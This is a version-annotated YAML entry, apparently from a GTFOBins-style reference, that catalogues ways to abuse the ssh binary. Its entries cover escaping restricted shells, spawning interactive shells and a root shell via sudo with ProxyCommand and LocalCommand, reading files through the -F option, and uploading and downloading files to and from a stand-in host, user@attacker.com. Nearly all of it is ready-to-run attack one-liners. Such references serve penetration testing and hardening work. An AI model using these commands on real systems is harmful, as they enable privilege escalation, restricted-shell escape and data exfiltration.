2018-05-21 21:14:41 +02:00
|
|
|
---
|
|
|
|
functions:
|
2018-10-05 19:55:38 +02:00
|
|
|
shell:
|
2018-07-16 15:01:50 +02:00
|
|
|
- description: Reconnecting may help bypassing restricted shells.
|
|
|
|
code: ssh localhost $SHELL --noprofile --norc
|
|
|
|
- description: Spawn interactive shell through ProxyCommand option.
|
2018-09-07 01:00:01 +02:00
|
|
|
code: ssh -o ProxyCommand=';sh 0<&2 1>&2' x
|
2022-05-01 11:07:53 +02:00
|
|
|
- description: Spawn interactive shell on client, requires a successful connection towards `host`.
|
|
|
|
code: ssh -o PermitLocalCommand=yes -o LocalCommand=/bin/sh host
|
2018-10-05 19:55:38 +02:00
|
|
|
file-upload:
|
2018-07-16 15:01:50 +02:00
|
|
|
- description: Send local file to a SSH server.
|
|
|
|
code: |
|
|
|
|
HOST=user@attacker.com
|
|
|
|
RPATH=file_to_save
|
|
|
|
LPATH=file_to_send
|
|
|
|
ssh $HOST "cat > $RPATH" < $LPATH
|
2018-10-05 19:55:38 +02:00
|
|
|
file-download:
|
2018-07-16 15:01:50 +02:00
|
|
|
- description: Fetch a remote file from a SSH server.
|
|
|
|
code: |
|
|
|
|
HOST=user@attacker.com
|
|
|
|
RPATH=file_to_get
|
|
|
|
LPATH=file_to_save
|
|
|
|
ssh $HOST "cat $RPATH" > $LPATH
|
2018-05-28 09:44:53 +02:00
|
|
|
file-read:
|
2018-07-16 15:01:50 +02:00
|
|
|
- description: The read file content is corrupted by error prints.
|
|
|
|
code: |
|
|
|
|
LFILE=file_to_read
|
|
|
|
ssh -F $LFILE localhost
|
2018-10-05 19:55:38 +02:00
|
|
|
sudo:
|
2018-07-16 15:01:50 +02:00
|
|
|
- description: Spawn interactive root shell through ProxyCommand option.
|
2018-09-07 01:00:01 +02:00
|
|
|
code: sudo ssh -o ProxyCommand=';sh 0<&2 1>&2' x
|
2018-05-21 21:14:41 +02:00
|
|
|
---
|